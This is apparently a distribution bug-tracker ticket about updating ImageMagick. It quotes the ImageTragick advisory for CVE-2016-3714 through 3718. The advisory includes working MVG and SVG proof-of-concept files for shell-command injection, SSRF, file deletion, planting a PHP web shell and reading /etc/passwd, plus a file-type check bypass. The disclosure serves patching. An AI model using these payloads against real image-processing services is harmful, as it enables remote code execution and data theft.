ImageMagick-7.0.1-2

[bdubbs@…]

New micro version.

Setting as placeholder because we really do not want to update more than about once a month unless there is a major issue.

Now there is a major issue.

[Douglas R. Reno]

Here's a major issue that I found mentioned on the oss-security mailing list a couple of days ago:

​https://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=29588 ​https://imagetragick.com/

ImageMagick: Multiple vulnerabilities in image decoder

1. CVE-2016-3714 - Insufficient shell characters filtering leads to(potentially remote) code execution

Insufficient filtering for filename passed to delegate's command allows remote code execution during conversion of several file formats.
 
ImageMagick allows to process files with external libraries. This feature is called 'delegate'. It is implemented as a system() with command string ('command') from the config file delegates.xml with actual value for different params (input/output filenames etc). Due to insufficient %M param filtering it is possible to conduct shell command injection. One of the default delegate's command is used to handle https requests:
"wget" -q -O "%o" "https:%M"

where %M is the actual link from the input. It is possible to pass the value like 
`https://example.com";|ls "-la`
and execute unexpected 'ls -la'. (wget or curl should be installed) 
$ convert 'https://example.com";|ls "-la' out.png
total 32
drwxr-xr-x 6 user group 204 Apr 29 23:08 .
drwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..


The most dangerous part is ImageMagick supports several formats like svg, mvg (thanks to Stewie for his research of this file format and idea of the local file read vulnerability in ImageMagick, see below), maybe some others - which allow to include external files from any supported protocol including delegates. As a result, any service, which uses ImageMagick to process user supplied images and uses default delegates.xml / policy.xml, may be vulnerable to this issue. 
exploit.mvg push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg";|ls "-la)'
pop graphic-context

exploit.svg <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd";>
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg"; xmlns:xlink=
"http://www.w3.org/1999/xlink";>
<image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la"
x="0" y="0" height="640px" width="480px"/>
</svg>


Example execution $ convert exploit.mvg out.png
total 32
drwxr-xr-x 6 user group 204 Apr 29 23:08 .
drwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..


ImageMagick tries to guess the type of the file by it's content, so exploitation doesn't depend on the file extension. You can rename exploit.mvg to exploit.jpg or exploit.png to bypass file type checks. In addition, ImageMagick's tool identify is also vulnerable, so it can't be used as a protection to filter file by it's content and creates additional attack vectors (e.g. via less exploit.jpg', because identify is invoked via lesspipe.sh). 

Ubuntu 14.04 and OS X, latest system packages (ImageMagick 6.9.3-7 Q16 x86_64 2016-04-27 and ImageMagick 6.8.6-10 2016-04-29 Q16) and latest sources from 6 and 7 branches all are vulnerable. Ghostscript and wget (or curl) should be installed on the system for successful PoC execution. For svg PoC ImageMagick's svg parser should be used, not rsvg. 
 All other issues also rely on dangerous ImageMagick feature of external files inclusion from any supported protocol in formats like svg and mvg.  
2. CVE-2016-3718 - SSRF 

It is possible to make HTTP GET or FTP request:
ssrf.mvg push graphic-context
viewbox 0 0 640 480
fill 'url(http://example.com/)'
pop graphic-context
the following then makes an http request to example.com $ convert ssrf.mvg out.png

3. CVE-2016-3715 - File deletion

It is possible to delete files by using ImageMagick's 'ephemeral' pseudo protocol which deletes files after reading:
delete_file.mvg push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/delete.txt'
popgraphic-context

$ touch /tmp/delete.txt
$ convert delete_file.mvg out.png # deletes /tmp/delete.txt


4. CVE-2016-3716 - File moving

It is possible to move image files to file with any extension in any folder by using ImageMagick's 'msl' pseudo protocol. msl.txt and image.gif should exist in known location - /tmp/ for PoC (in real life it may be web service written in PHP, which allows to upload raw txt files and process images with ImageMagick): 
file_move.mvg push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'msl:/tmp/msl.txt'
popgraphic-context

/tmp/msl.txt <?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="/tmp/image.gif" />
<write filename="/var/www/shell.php" />
</image>



/tmp/image.gif - image with php shell inside (https://www.secgeek.net/POC/POC.gif for example) 
$ convert file_move.mvg out.png # moves /tmp/image.gif to /var/www/shell.php

5. CVE-2016-3717 - Local file read (independently reported by original research author - Stewie)

It is possible to get content of the files from the server by using ImageMagick's 'label' pseudo protocol: 
file_read.mvg push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@/etc/passwd'
pop graphic-context

$ convert file_read.mvg out.png

produces file with text rendered from /etc/passwd

!!! "produces file with text rendered from /etc/passwd"

Supposedly fixed in 7.0.1-2.

For those wondering where I get my information, I am subscribed to the oss-security mailing list, where all of the CVE Requests end up going.

[bdubbs@…]

Fixed at revision 17344.